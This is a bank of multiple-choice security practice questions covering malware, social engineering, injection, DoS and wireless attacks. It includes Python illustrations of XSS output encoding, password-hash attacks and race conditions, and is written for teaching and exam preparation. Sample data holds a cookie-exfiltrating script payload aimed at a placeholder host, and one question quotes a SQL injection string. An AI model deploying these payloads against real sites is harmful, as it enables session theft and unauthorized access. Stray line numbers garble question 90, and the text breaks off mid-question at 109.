Mar 01, 2019, 04:14 AM
1. John is analyzing strange behavior on computers in his network. He believes there is malware on the machines. The symptoms include strange behavior that persists, even if he boots the machine to a Linux Live CD. What is the most likely cause?
A. Ransomware
B. Boot sector virus
C. Rootkit
D. Key logger
2. Ahmed is a sales manager with a major insurance company. He has received an email that is encouraging him to click on a link and fill out a survey. He is suspicious of the email, but it does mention a major insurance association, and that makes him think it might be legitimate. Which of the following best describes this attack?
A. Phishing
B. Social engineering
C. Spear phishing
D. Trojan horse
3. You are a security administrator for a medium-sized bank. You have discovered a piece of software on your bank’s database server that is not supposed to be there. It appears that the software will begin deleting database files if a specific employee is terminated. What best describes this?
A. Worm
B. Logic bomb
C. Trojan horse
D. Rootkit
4. You are responsible for incident response at Acme bank. The Acme bank website has been attacked. The attacker used the login screen, but rather than enter login credentials, he or she entered some odd text: ' or '1' = '1. What is the best description for this attack?
A. Cross-site scripting
B. Cross-site request forgery
C. SQL injection
D. ARP poisoning
5. Juanita is a network administrator for a small accounting firm. The users on her network are complaining of slow connectivity. When she examines the firewall logs, she observes a large number of half-open connections. What best describes this attack?
A. DDoS
B. SYN flood
C. Buffer overflow
D. ARP poisoning
6. Frank is deeply concerned about attacks on his company’s e-commerce server. He is particularly worried about cross-site scripting and SQL injection. Which of the following would best defend against these two specific attacks?
A. Encrypted web traffic
B. Filtering user input
C. A firewall
D. An IDS
7. You are responsible for network security at Acme Company. Users have been reporting that personal data is being stolen when using the wireless network. They all insist they only connect to the corporate wireless access point (WAP). However, logs for the WAP show that these users have not connected to it. Which of the following could best explain this situation?
A. Session hijacking
B. Clickjacking
C. Rogue access point
D. Bluejacking
8. What type of attack depends on the attacker entering JavaScript into a text area that is intended for users to enter text that will be viewed by other users?
A. SQL injection
B. Clickjacking
C. Cross-site scripting
D. Bluejacking
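Questions 6 and 8 turn on the same mechanism: text one user submits is written into a page that other users view, and a <script> payload in that text runs in their browsers unless the output is encoded before rendering. The Python below is an added illustration and is not part of the original question set; the sample posts, the comment wrapper markup and the username allowlist are constructed for the example. It shows the vulnerable rendering beside the encoded one, and the allowlist validation that "filtering user input" refers to for a field with a known shape.

```python
import html
import re

# Constructed sample posts (not real data): what different users might type
# into a comment box whose contents are later shown to other users.
USER_POSTS = [
    "Great product, would buy again!",
    "<script>document.location='http://evil.example/?c='+document.cookie</script>",
    "Use <b>bold</b> sparingly & don't overdo it",
]

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_unsafe(text: str) -> str:
    """Vulnerable: user text is concatenated straight into the page, so a
    <script> payload is handed to every visitor's browser for execution."""
    return f"<div class='comment'>{text}</div>"


def render_safe(text: str) -> str:
    """Output encoding: every HTML-significant character (& < > " ') is
    replaced by an entity, so the browser displays the payload as text."""
    return f"<div class='comment'>{html.escape(text, quote=True)}</div>"


def contains_live_script(fragment: str) -> bool:
    """True if the rendered fragment still carries a parseable <script> tag."""
    return SCRIPT_TAG.search(fragment) is not None


USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")


def validate_username(value: str) -> bool:
    """Allowlist validation for a field with a known shape: anything other
    than letters, digits and underscore is rejected before it is stored.
    This complements output encoding and parameterized queries rather than
    replacing them; a free-text comment cannot be allowlisted this tightly."""
    return USERNAME_RE.fullmatch(value) is not None


def render_page(posts, safe: bool = True) -> str:
    """Render every post with either the vulnerable or the encoding renderer."""
    renderer = render_safe if safe else render_unsafe
    return "\n".join(renderer(p) for p in posts)
```

html.escape is the whole of the fix for the stored-XSS case: the same payload is still in the database, but what reaches the browser is `&lt;script&gt;...`, which it shows rather than runs. The allowlist check belongs at the input boundary, but only for fields whose legitimate values have a fixed shape.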
9. A sales manager at your company is complaining about slow performance on his computer. When you thoroughly investigate the issue, you find spyware on his computer. He insists that the only thing he has downloaded recently was a freeware stock trading application. What would best explain this situation?
A. Logic bomb
B. Trojan horse
C. Rootkit
D. Macro virus
10. Your company outsourced development of an accounting application to a local programming firm. After three months of using the product, one of your accountants accidentally discovers a way to log in and bypass all security and authentication. What best describes this?
A. Logic bomb
B. Trojan horse
C. Backdoor
D. Rootkit
11. Teresa is the security manager for a mid-sized insurance company. She receives a call from law enforcement, telling her that some computers on her network participated in a massive denial-of-service (DoS) attack. Teresa is certain that none of the employees at her company would be involved in a cybercrime. What would best explain this scenario?
A. It is a result of social engineering.
B. The machines all have backdoors.
C. The machines are bots.
D. The machines are infected with crypto-viruses.
12. Mike is a network administrator with a small financial services company. He has received a popup window that states his files are now encrypted and he must pay 0.5 bitcoins to get them decrypted. He tries to check the files in question, but their extensions have changed, and he cannot open them. What best describes this situation?
A. Mike’s machine has a rootkit.
B. Mike’s machine has ransomware.
C. Mike’s machine has a logic bomb.
D. Mike’s machine has been the target of whaling.
13. Terrance is examining logs for the company e-commerce web server. He discovers a number of redirects that cannot be explained. After carefully examining the website, he finds some attacker performed a watering hole attack by placing JavaScript in the website and is redirecting users to a phishing website. Which of the following techniques would be best at preventing this in the future?
A. An SPI firewall
B. An active IDS/IPS
C. Checking buffer boundaries
D. Checking user input
14. What type of attack is based on sending more data to a target variable than the variable can actually hold?
A. Bluesnarfing
B. Buffer overflow
C. Bluejacking
D. DDoS
15. You have been asked to test your company network for security issues. The specific test you are conducting involves primarily using automated and semiautomated tools to look for known vulnerabilities with the various systems on your network. Which of the following best describes this type of test?
A. Vulnerability scan
B. Penetration test
C. Security audit
D. Security test
16. Jared discovers that attackers have breached his WiFi network. They have gained access via the wireless access point (WAP) administrative panel, and have logged on with the credentials the WAP shipped with. What best describes this issue?
A. Default configuration
B. Race conditions
C. Failure to patch
D. Weak encryption
17. Joanne is concerned about social engineering. She is particularly concerned that this technique could be used by an attacker to obtain information about the network, including possibly even passwords. What countermeasure would be most effective in combating social engineering?
A. SPI firewall
B. An IPS
C. User training
D. Strong policies
18. You are responsible for incident response at a mid-sized bank. You have discovered that someone was able to successfully breach your network and steal data from your database server. All servers are configured to forward logs to a central logging server. However, when you examine that central log, there are no entries after 2:13 a.m. two days ago. You check the servers, and they are sending logs to the right server, but they are not getting there. Which of the following would be most likely to explain this?
A. Your log server has a backdoor.
B. Your log server has been hit with a buffer overflow attack.
C. Your switches have been hit with ARP poisoning.
D. Your IDS is malfunctioning and blocking log transmissions.
19. Coleen is the web security administrator for an online auction website. A small number of users are complaining that when they visit the website and log in, they are told the service is down and to try again later. Coleen checks and she can visit the site without any problem, even from computers outside the network. She also checks the web server log and there is no record of those users ever connecting. Which of the following might best explain this?
A. Typosquatting
B. SQL injection
C. Cross-site scripting
D. Cross-site request forgery
20. Mahmoud is responsible for managing security at a large university. He has just performed a threat analysis for the network, and based on past incidents and studies of similar networks, he has determined that the most prevalent threat to his network is low-skilled attackers who wish to breach the system, simply to prove they can or for some low-level crime, such as changing a grade. Which term best describes this type of attacker?
A. Hacktivist
B. Amateur
C. Insider
D. Script kiddie
21. Which of the following best describes a collection of computers that have been compromised and are being controlled from one central point?
A. Zombienet
B. Botnet
C. Nullnet
D. Attacknet
22. John is conducting a penetration test of a client’s network. He is currently gathering information from sources such as archive.org, netcraft.com, social media, and information websites. What best describes this stage?
A. Active reconnaissance
B. Passive reconnaissance
C. Initial exploitation
D. Pivot
23. One of the salespeople in your company reports that his computer is behaving sluggishly. You check but don’t see any obvious malware. However, in his temp folder you find JPEGs that look like screenshots of his desktop. Which of the following is the most likely cause?
A. He is stealing data from the company.
B. There is a backdoor on his computer.
C. There is spyware on his computer.
D. He needs to update his Windows.
24. What type of attack is based on entering fake entries into a target network’s domain name server?
A. DNS poisoning
B. ARP poisoning
C. Bluesnarfing
D. Bluejacking
25. Frank has been asked to conduct a penetration test of a small bookkeeping firm. For the test, he has only been given the company name, the domain name for their website, and the IP address of their gateway router. What best describes this type of test?
A. White-box test
B. External test
C. Black-box test
D. Threat test
26. You work for a security company that performs penetration testing for clients. You are conducting a test of an e-commerce company. You discover that after compromising the web server, you can use the web server to launch a second attack into the company’s internal network. What best describes this?
A. Internal attack
B. White-box testing
C. Black-box testing
D. A pivot
27. While investigating a malware outbreak on your company network, you discover something very odd. There is a file that has the same name as a Windows system DLL, and even has the same API interface, but handles input very differently, in a manner to help compromise the system, and it appears that applications have been loading this file rather than the real system DLL. What best describes this?
A. Shimming
B. Trojan horse
C. Backdoor
D. Refactoring
28. Your company has hired a penetration testing firm to test the network. For the test, you have given the company details on operating systems you use, applications you run, and network devices. What best describes this type of test?
A. White-box test
B. External test
C. Black-box test
D. Threat test
29. Frank is a network administrator for a small college. He discovers that several machines on his network are infected with malware. That malware is sending a flood of packets to a target external to the network. What best describes this attack?
A. SYN flood
B. DDoS
C. Botnet
D. Backdoor
30. John is a salesman for an automobile company. He recently downloaded a program from an unknown website, and now his client files have their file extensions changed, and he cannot open them. He has received a popup window that states his files are now encrypted and he must pay 0.5 bitcoins to get them decrypted. What has happened?
A. His machine has a rootkit.
B. His machine has a logic bomb.
C. His machine has a boot sector virus.
D. His machine has ransomware.
31. When phishing attacks are so focused that they target a specific individual, they are called what?
A. Spear phishing
B. Targeted phishing
C. Phishing
D. Whaling
32. You are concerned about a wide range of attacks that could affect your company’s web server. You have recently read about an attack wherein the attacker sends more data to the target than the target is expecting. If done properly, this could cause the target to crash. What would best prevent this type of attack?
A. An SPI firewall
B. An active IDS/IPS
C. Checking buffer boundaries
D. Checking user input
33. You work for a large retail company that processes credit card purchases. You have been asked to test your company network for security issues. The specific test you are conducting involves primarily checking policies, documentation, and past incident reports. Which of the following best describes this type of test?
A. Vulnerability scan
B. Penetration test
C. Security audit
D. Security test
34. Maria is a salesperson with your company. After a recent sales trip, she discovers that many of her logins have been compromised. You carefully scan her laptop and cannot find any sign of any malware. You do notice that she had recently connected to a public WiFi at a coffee shop, and it is only since that connection that she noticed her logins had been compromised. What would most likely explain what has occurred?
A. She connected to a rogue AP.
B. She downloaded a Trojan horse.
C. She downloaded spyware.
D. She is the victim of a buffer overflow attack.
35. You are the manager for network operations at your company. One of the accountants sees you in the hall and thanks you for your team keeping his antivirus software up to date. When you ask him what he means, he mentions that one of your staff, named Mike, called him and remotely connected to update the antivirus. You don’t have an employee named Mike. What has occurred?
A. IP spoofing
B. MAC spoofing
C. Man-in-the-middle attack
D. Social engineering
36. You are a security administrator for a bank. You are very interested in detecting any breaches or even attempted breaches of your network, including those from internal personnel. But you don’t want false positives to disrupt work. Which of the following devices would be the best choice in this scenario?
A. IPS
B. WAF
C. SIEM
D. IDS
37. One of your users cannot recall the password for their laptop. You want to recover that password for them. You intend to use a tool/technique that is popular with hackers, and it consists of searching tables of precomputed hashes to recover the password. What best describes this?
A. Rainbow table
B. Backdoor
C. Social engineering
D. Dictionary attack
38. You have noticed that when in a crowded area, you sometimes get a stream of unwanted text messages. The messages end when you leave the area. What describes this attack?
A. Bluejacking
B. Bluesnarfing
C. Evil twin
D. Rogue access point
39. Someone has been rummaging through your company’s trash bins seeking to find documents, diagrams, or other sensitive information that has been thrown out. What is this called?
A. Dumpster diving
B. Trash diving
C. Social engineering
D. Trash engineering
40. You have noticed that when in a crowded area, data from your cell phone is stolen. Later investigation shows a Bluetooth connection to your phone, one that you cannot explain. What describes this attack?
A. Bluejacking
B. Bluesnarfing
C. Evil twin
D. RAT
41. Louis is investigating a malware incident on one of the computers on his network. He has discovered unknown software that seems to be opening a port, allowing someone to remotely connect to the computer. This software seems to have been installed at the same time as a small shareware application. Which of the following best describes this malware?
A. RAT
B. Backdoor
C. Logic bomb
D. Rootkit
42. This is a common security issue that is extremely hard to control in large environments. It occurs when a user has more computer rights, permissions, and privileges than what is required for the tasks the user needs to perform. What best describes this scenario?
A. Excessive rights
B. Excessive access
C. Excessive permissions
D. Excessive privileges
43. Jared is responsible for network security at his company. He has discovered behavior on one computer that certainly appears to be a virus. He has even identified a file he thinks might be the virus. However, using three separate antivirus programs, he finds that none can detect the file. Which of the following is most likely to be occurring?
A. The computer has a RAT.
B. The computer has a zero-day exploit.
C. The computer has a logic bomb.
D. The computer has a rootkit.
44. There are some computers on your network that use Windows XP. They have to stay on Windows XP due to a specific application they are running. That application won’t run on newer operating systems. What security concerns does this situation give you?
A. No special concerns; this is normal.
B. The machines cannot be patched; XP is no longer supported.
C. The machines cannot coordinate with a SIEM since XP won’t support that.
D. The machines are more vulnerable to DoS attacks.
45. Farès has discovered that attackers have breached his wireless network. They seem to have used a brute-force attack on the Wi-Fi Protected Setup (WPS) PIN to exploit the WAP and recover the WPA2 password. What is this attack called?
A. Evil twin
B. Rogue WAP
C. IV attack
D. WPS attack
46. Your wireless network has been breached. It appears the attacker modified a portion of data used with the stream cipher and utilized this to expose wirelessly encrypted data. What is this attack called?
A. Evil twin
B. Rogue WAP
C. IV attack
D. WPS attack
47. John is concerned about disgruntled employees stealing company documents and exfiltrating them from the network. He is looking for a solution that will detect likely exfiltration and block it. What type of system is John looking for?
A. IPS
B. SIEM
C. Honeypot
D. Firewall
48. Some users on your network use Acme Bank for their personal banking. Those users have all recently been the victim of an attack, wherein they visited a fake Acme Bank website and their logins were compromised. They all visited the bank website from your network, and all of them insist they typed in the correct URL. What is the most likely explanation for this situation?
A. Trojan horse
B. IP spoofing
C. Clickjacking
D. DNS poisoning
49. Users are complaining that they cannot connect to the wireless network. You discover that the WAPs are being subjected to a wireless attack designed to block their WiFi signals. Which of the following is the best label for this attack?
A. IV attack
B. Jamming
C. WPS attack
D. Botnet
50. What type of attack involves users clicking on something different on a website than what they intended to click on?
A. Clickjacking
B. Bluesnarfing
C. Bluejacking
D. Evil twin
51. What type of attack exploits the trust that a website has for an authenticated user to attack that website by spoofing requests from the trusted user?
A. Cross-site scripting
B. Cross-site request forgery
C. Bluejacking
D. Evil twin
52. John is a network administrator for Acme Company. He has discovered that someone has registered a domain name that is spelled just one letter different than his company’s domain. The website with the misspelled URL is a phishing site. What best describes this attack?
A. Session hijacking
B. Cross-site request forgery
C. Typosquatting
D. Clickjacking
53. Frank has discovered that someone was able to get information from his smartphone using a Bluetooth connection. The attacker was able to get his contact list and some emails he had received. What is this type of attack called?
A. Bluesnarfing
B. Session hijacking
C. Backdoor attack
D. CSRF
54. Juanita is a network administrator for Acme Company. Some users complain that they keep getting dropped from the network. When Juanita checks the logs for the wireless access point (WAP), she finds that deauthentication frames have been sent to the WAP, apparently from the users’ devices. What seems to be happening here?
A. Problem with users’ WiFi configuration
B. Disassociation attack
C. Session hijacking
D. Backdoor attack
55. John has discovered that an attacker is trying to get network passwords by using software that attempts a number of passwords from a list of common passwords. What type of attack is this?
A. Dictionary
B. Rainbow table
C. Brute force
D. Session hijacking
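Questions 37 and 55 describe two password-recovery techniques that differ only in when the hashing work is done: a dictionary attack hashes each candidate at attack time, while a precomputed table hashes the candidates once and then answers by lookup. The Python below is an added example, not from the original question set; the wordlist, the fixed salt and the choice of plain SHA-256 (no per-password salt, no work factor, which is exactly what makes precomputation pay off) are constructed assumptions. The lookup table here is the simplest precomputed form; a real rainbow table stores the same coverage more compactly as hash/reduce chains, and a per-user salt defeats both in the same way, as the last two functions show.

```python
import hashlib
from typing import Dict, Optional

# Constructed wordlist of common passwords (not real data).
WORDLIST = ["123456", "password", "letmein", "qwerty", "Summer2019", "hunter2"]

# Constructed per-user salt for the example; a real system draws a fresh
# random salt from os.urandom for every account and stores it beside the hash.
SALT = bytes.fromhex("9f1c4b7e2a0d5e31")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def unsalted_hash(password: str) -> str:
    """What a weak password store holds: a bare hash of the password."""
    return sha256_hex(password.encode())


def salted_hash(password: str, salt: bytes) -> str:
    """Salted store: the same password hashes differently for every user."""
    return sha256_hex(salt + password.encode())


def dictionary_attack(target_hash: str, wordlist, salt: bytes = b"") -> Optional[str]:
    """Hash every candidate at attack time (question 55). The attacker pays
    one hash per guess per target; a known salt does not stop this, it is
    simply prepended to each guess."""
    for word in wordlist:
        if sha256_hex(salt + word.encode()) == target_hash:
            return word
    return None


def build_lookup_table(wordlist) -> Dict[str, str]:
    """Precompute hash -> plaintext once and reuse it against any number of
    stolen hashes (question 37). Built for unsalted hashes only: with a
    salt the attacker would need one table per salt value."""
    return {unsalted_hash(w): w for w in wordlist}


def table_attack(target_hash: str, table: Dict[str, str]) -> Optional[str]:
    """Constant-time lookup: no hashing is done at attack time at all."""
    return table.get(target_hash)
```

Against an unsalted hash both attacks recover "letmein"; against the salted hash the precomputed table finds nothing, and only the dictionary attack, paying the hashing cost again with the salt in hand, succeeds.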
56. You are a network security administrator for a bank. You discover that an attacker has exploited a flaw in OpenSSL and forced some connections to move to a weak cipher suite version of TLS, which the attacker could breach. What type of attack was this?
A. Disassociation attack
B. Downgrade attack
C. Session hijacking
D. Brute force
57. When an attacker tries to find an input value that will produce the same hash as a password, what type of attack is this?
A. Rainbow table
B. Brute force
C. Session hijacking
D. Collision attack
58. Farès is the network security administrator for a company that creates advanced routers and switches. He has discovered that his company’s networks have been subjected to a series of advanced attacks over a period of time. What best describes this attack?
A. DDoS
B. Brute force
C. APT
D. Disassociation attack
59. You are responsible for incident response at Acme Company. One of your jobs is to attempt to attribute attacks to a specific type of attacker. Which of the following would not be one of the attributes you consider in attributing the attack?
A. Level of sophistication
B. Resources/funding
C. Intent/motivation
D. Amount of data stolen
60. John is running an IDS on his network. Users sometimes report that the IDS flags legitimate traffic as an attack. What describes this?
A. False positive
B. False negative
C. False trigger
D. False flag
61. You are performing a penetration test of your company’s network. As part of the test, you will be given a login with minimal access and will attempt to gain administrative access with this account. What is this called?
A. Privilege escalation
B. Session hijacking
C. Root grabbing
D. Climbing
62. Mary has discovered that a web application used by her company does not always handle multithreading properly, particularly when multiple threads access the same variable. This could allow an attacker who discovered this vulnerability to exploit it and crash the server. What type of error has Mary discovered?
A. Buffer overflow
B. Logic bomb
C. Race conditions
D. Improper error handling
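The "multiple threads access the same variable" failure in question 62 is a lost-update race: each thread reads the shared value, computes, and writes back, and whichever write lands last erases the others. The Python below is an added example, not from the original question set. The shared slot counter is a constructed stand-in for whatever server state the question has in mind; a threading.Barrier is used so the worst-case interleaving (every thread reads before any thread writes) happens every run instead of only under load, which makes the lost updates reproducible. The fixed version keeps the barrier and adds a lock around the read-modify-write.

```python
import threading


class SlotCounter:
    """Shared state: how many of a server's worker slots are in use.
    Constructed scenario (not from the original question): each request
    does 'read count, add one, write count back'."""

    def __init__(self) -> None:
        self.value = 0
        self.lock = threading.Lock()


def _run(n_threads: int, worker) -> None:
    threads = [threading.Thread(target=worker) for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


def racy_increment(n_threads: int) -> int:
    """Unsynchronized read-modify-write. The Barrier forces the worst-case
    interleaving deterministically: every thread reads 0 before any thread
    writes, so every thread writes 1 and n_threads - 1 updates are lost.
    Returns the final counter value (1 for any n_threads >= 1)."""
    counter = SlotCounter()
    barrier = threading.Barrier(n_threads)

    def worker() -> None:
        current = counter.value        # read the shared value
        barrier.wait()                 # wait until every other thread has read too
        counter.value = current + 1    # write: clobbers the other threads' writes

    _run(n_threads, worker)
    return counter.value


def locked_increment(n_threads: int) -> int:
    """Same workload with the read-modify-write made atomic by a lock. The
    barrier still releases all threads at the same instant, but only one at
    a time can be inside the critical section, so no update is lost.
    Returns the final counter value (n_threads)."""
    counter = SlotCounter()
    barrier = threading.Barrier(n_threads)

    def worker() -> None:
        barrier.wait()                 # all threads attempt the update together
        with counter.lock:             # critical section: read and write as one step
            current = counter.value
            counter.value = current + 1

    _run(n_threads, worker)
    return counter.value
```

The same pattern on a resource count that gates allocation (free slots, open descriptors, buffer space) is how a race turns into the crash the question mentions: the counter drifts from reality, the server either exhausts the resource or frees it twice, and it falls over.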
63. An attacker is trying to get access to your network. He is sending users on your network a link to a freeware stock-monitoring program. However, that stock-monitoring program has attached to it software that will give the attacker access to any machine that it is installed on. What type of attack is this?
A. Rootkit
B. Trojan horse
C. Spyware
D. Boot sector virus
64. Acme Company uses its own internal certificate server for all internal encryption. However, their certificate authority only publishes a CRL once per week. Does this pose a danger, and if so what?
A. Yes, this means a revoked certificate could be used for up to seven days.
B. No, this is standard for all certificate authorities.
C. Yes, this means it would be easy to fake a certificate.
D. No, since this is being used only internally.
65. When a program has variables, especially arrays, and does not check the boundary values before inputting data, what attack is the program vulnerable to?
A. XSS
B. CSRF
C. Buffer overflow
D. Logic bomb
66. Which of the following best describes malware that will execute some malicious activity when a particular condition is met (i.e., if condition is met, then execute)?
A. Boot sector virus
B. Logic bomb
C. Buffer overflow
D. Sparse infector virus
67. Gerald is a network administrator for Acme Company. Users are reporting odd behavior on their computers. He believes this may be due to malware, but the behavior is different on different computers. What might best explain this?
A. It is not malware, but hardware failure.
B. It is a boot sector virus.
C. It is a macro virus.
D. It is a polymorphic virus.
68. Teresa is a security officer at ACME Inc. She has discovered an attack where the attacker sent multiple broadcast messages to the network routers, spoofing an IP address of one of the network servers. This caused the network to send a flood of packets to that server and it is no longer responding. What is this attack called?
A. Smurf attack
B. DDoS attack
C. TCP hijacking attack
D. TCP SYN flood attack
69. Which type of virus is able to alter its own code to avoid being detected by antivirus software?
A. Boot sector
B. Hoax
C. Polymorphic
D. Stealth
70. Gerald is a network administrator for a small financial services company. Users are reporting odd behavior that appears to be caused by a virus on their machines. After isolating the machines that he believes are infected, Gerald analyzes them. He finds that all the infected machines received an email purporting to be from accounting, with an Excel spreadsheet, and the users opened the spreadsheet. What is the most likely issue on these machines?
A. A macro virus
B. A boot sector virus
C. A Trojan horse
D. A RAT
71. Fred is on the incident response team for a major insurance company. His specialty is malware analysis. He is studying a file that is suspected of being a virus that infected the company network last month. The file seems to intermittently have bursts of malicious activity, interspersed with periods of being dormant. What best describes this malware?
A. A macro virus
B. A logic bomb
C. A sparse infector virus
D. A polymorphic virus
72. What is the term used to describe a virus that can infect both program files and boot sectors?
A. Polymorphic
B. Multipartite
C. Stealth
D. Multiple encrypting
73. Your company has hired an outside security firm to perform various tests of your network. During the vulnerability scan you will provide that company with logins for various systems (i.e., database server, application server, web server, etc.) to aid in their scan. What best describes this?
A. A white-box test
B. A gray-box test
C. A privileged scan
D. An authenticated user scan
74. Which of the following is commonly used in a distributed denial of service (DDoS) attack?
A. Phishing
B. Adware
C. Botnet
D. Trojan
75. You are investigating a recent breach at Acme Company. You discover that the attacker used an old account of someone no longer at the company. The account was still active. Which of the following best describes what caused this vulnerability to exist?
A. Improperly configured accounts
B. Untrained users
C. Using default configuration
D. Failure to patch systems
76. Juan is responsible for incident response at a large financial institution. He discovers that the company WiFi has been breached. The attacker used the same login credentials that ship with the wireless access point (WAP). The attacker was able to use those credentials to access the WAP administrative console and make changes. Which of the following best describes what caused this vulnerability to exist?
A. Improperly configured accounts
B. Untrained users
C. Using default configuration
D. Failure to patch systems
77. Elizabeth is investigating a network breach at her company. She discovers a program that was able to execute code within the address space of another process by using the target process to load a specific library. What best describes this attack?
A. Logic bomb
B. Session hijacking
C. Buffer overflow
D. DLL injection
78. Zackary is a malware investigator with a cybersecurity firm. He is investigating malware that is able to compromise a target program by finding null references in the target program and dereferencing them, causing an exception to be generated. What best describes this type of attack?
A. DLL injection
B. Buffer overflow
C. Memory leak
D. Pointer dereference
79. Frank has just taken over as CIO of a mid-sized insurance company. One of the first things he does is order a thorough inventory of all network equipment. He discovers two routers that are not documented. He is concerned that if they are not documented, they might not be securely configured, tested, and safe. What best describes this situation?
A. Poor user training
B. System sprawl
C. Failure to patch systems
D. Default configuration
80. What is the primary difference between an intrusive and a nonintrusive vulnerability scan?
A. An intrusive scan is a penetration test.
B. A nonintrusive scan is just a document check.
C. An intrusive scan could potentially disrupt operations.
D. A nonintrusive scan won’t find most vulnerabilities.
81. Daryl is investigating a recent breach of his company’s web server. The attacker used sophisticated techniques and then defaced the website, leaving messages that were denouncing the company’s public policies. He and his team are trying to determine the type of actor who most likely committed the breach. Based on the information provided, who was the most likely threat actor?
A. A script kiddie
B. A nation-state
C. Organized crime
D. Hacktivists
82. When investigating breaches and attempting to attribute them to specific threat actors, which of the following is not one of the indicators of an APT?
A. Long-term access to the target
B. Sophisticated attacks
C. The attack comes from a foreign IP address.
D. The attack is sustained over time.
83. What type of attack uses a second wireless access point (WAP) that broadcasts the same SSID as a legitimate access point, in an attempt to get users to connect to the attacker’s WAP?
A. Evil twin
B. IP spoofing
C. Trojan horse
D. MAC spoofing
84. You are investigating a breach of a large technical company. You discover that there have been several different attacks over a period of a year. The attacks were sustained, each lasting several weeks of continuous attack. The attacks were somewhat sophisticated and originated from a variety of IP addresses, but all the IP addresses are within your country. Which threat actor would you most suspect of being involved in this attack?
A. Nation-state
B. Hacktivist
C. Script kiddie
D. A lone highly skilled hacker
85. Which of the following best describes a zero-day vulnerability?
A. A vulnerability that has been known to the vendor for zero days
B. A vulnerability that has not yet been breached
C. A vulnerability that can be quickly exploited (i.e., in zero days)
D. A vulnerability that will give the attacker brief access (i.e., zero days)
86. You have discovered that there are entries in your network’s domain name server that point legitimate domains to unknown and potentially harmful IP addresses. What best describes this type of attack?
A. A backdoor
B. An APT
C. DNS poisoning
D. A Trojan horse
87. What best describes an attack that attaches some malware to a legitimate program so that when the user installs the legitimate program, they inadvertently install the malware?
A. Backdoor
B. Trojan horse
C. RAT
D. Polymorphic virus
88. Which of the following best describes software that will provide the attacker with remote access to the victim’s machine, but that is wrapped with a legitimate program in an attempt to trick the victim into installing it?
A. RAT
B. Backdoor
C. Trojan horse
D. Macro virus
89. Which of the following is an attack that seeks to attack a website, based on the website’s trust of an authenticated user?
A. XSS
B. CSRF
C. Buffer overflow
D. RAT
65890. John is analyzing what he believes is a malware outbreak on his network. Many users
659report their machines are behaving strangely. The anomalous behavior seems to occur
660sporadically and John cannot find a pattern. What is the most likely cause?
661A. APT
662B. Boot sector virus
663C. Sparse infector virus
664D. Key logger

91. Farès is the CISO of a bank. He has received an email that is encouraging him to click on a link and fill out a survey. Being security conscious, he normally does not click on links. However, this email calls him by name and claims to be a follow-up to a recent conference he attended. Which of the following best describes this attack?
A. Clickjacking
B. Social engineering
C. Spear phishing
D. Whaling

92. You are responsible for technical support at your company. Users are all complaining of very slow Internet connectivity. When you examine the firewall, you find a large number of incoming connections that are not completed, all packets coming from a single IP address. What best describes this attack?
A. DDoS
B. SYN flood
C. Buffer overflow
D. ARP poisoning

93. An attacker is trying to get malformed queries sent to the backend database to circumvent the web page’s security. What type of attack depends on the attacker entering text into text boxes on a web page that is not normal text, but rather odd-looking commands that are designed to be inserted into database queries?
A. SQL injection
B. Clickjacking
C. Cross-site scripting
D. Bluejacking

94. Tyrell is responsible for selecting cryptographic products for his company. The company wants to encrypt the drives of all laptops. The product they have selected uses 128-bit AES encryption for full disk encryption, and users select a password to decrypt the drive. What, if any, would be the major weakness in this system?
A. None; this is a good system.
B. The 128-bit AES key is too short.
C. The passwords users select are the weak link.
D. The AES algorithm is the problem; they should use DES.

95. Valerie is responsible for security testing applications in her company. She has discovered that a web application, under certain conditions, can generate a memory leak. What type of attack would this leave the application vulnerable to?
A. DoS
B. Backdoor
C. SQL injection
D. Buffer overflow

96. When a multithreaded application does not properly handle various threads accessing a common value, what flaw is this?
A. Memory leak
B. Buffer overflow
C. Integer overflow
D. Race condition

97. Acme Company is using smart cards that use near-field communication (NFC) rather than needing to be swiped. This is meant to make physical access to secure areas more secure. What vulnerability might this also create?
A. Tailgating
B. Eavesdropping
C. IP spoofing
D. Race conditions

98. John is responsible for physical security at a large manufacturing plant. Employees all use a smart card in order to open the front door and enter the facility. Which of the following is a common way attackers would circumvent this system?
A. Phishing
B. Tailgating
C. Spoofing the smart card
D. RFID spoofing

99. Which of the following is the term for an attack wherein malware inserts itself as a library, such as a DLL, between an application and the real system library the application is attempting to communicate with?
A. Application spoofing
B. Jamming
C. Evil twin
D. Shimming

100. You are responsible for incident response at Acme Corporation. You have discovered that someone has been able to circumvent the Windows authentication process for a specific network application. It appears that the attacker took the stored hash of the password and sent it directly to the backend authentication service, bypassing the application. What type of attack is this?
A. Hash spoofing
B. Evil twin
C. Shimming
D. Pass the hash

101. A user in your company reports that she received a call from someone claiming to be from the company technical support team. The caller stated that there was a virus spreading through the company and he needed immediate access to the employee’s computer to stop it from being infected. What social-engineering principles did the caller use to try to trick the employee?
A. Urgency and intimidation
B. Urgency and authority
C. Authority and trust
D. Intimidation and authority

102. Ahmed has discovered that someone has manipulated tables in one of the company’s switches. The manipulation has changed the tables so that data destined for one specific MAC address will now be routed elsewhere. What type of attack is this?
A. ARP poisoning
B. DNS poisoning
C. Man-in-the-middle
D. Backdoor

103. You are investigating incidents at Acme Corporation and have discovered malware on several machines. It appears that this malware infects system files in the Windows/System32/ directory and also affects the boot sector. What type of malware is this?
A. Multipartite
B. Boot sector
C. Macro virus
D. Polymorphic virus

104. What type of attack uses Bluetooth to access the data from a cell phone when in range?
A. Phonejacking
B. Bluejacking
C. Bluesnarfing
D. Evil twin

105. An attacker is using a table of precomputed hashes in order to try to get a Windows password. What type of technique is being used?
A. Dictionary
B. Brute force
C. Pass the hash
D. Rainbow table

106. Carlos works in incident response for a mid-sized bank. Users inform him that internal network connections are fine, but connecting to the outside world is very slow. Carlos reviews logs on the external firewall and discovers tens of thousands of ICMP packets coming from a wide range of different IP addresses. What type of attack is occurring?
A. Smurf
B. DoS
C. DDoS
D. SYN flood

107. What type of attack is it when the attacker attempts to get the victim’s communication to abandon a high-quality/secure mode in favor of a lower-quality/less secure mode?
A. Downgrade
B. Brute force
C. Rainbow table
D. Bluesnarfing

108. What type of penetration test is being done when the tester is given extensive knowledge of the target network?
A. White-box
B. Full disclosure
C. Black-box
D. Red team

109. Your company is instituting a new security awareness program. You are responsible for educating end users on a variety of threats, including social engineering. Which of the following best defines social engineering?
A. Illegal copying of software
B. Gathering information from discarded manuals and printouts
C. Using people skills to obtain proprietary information
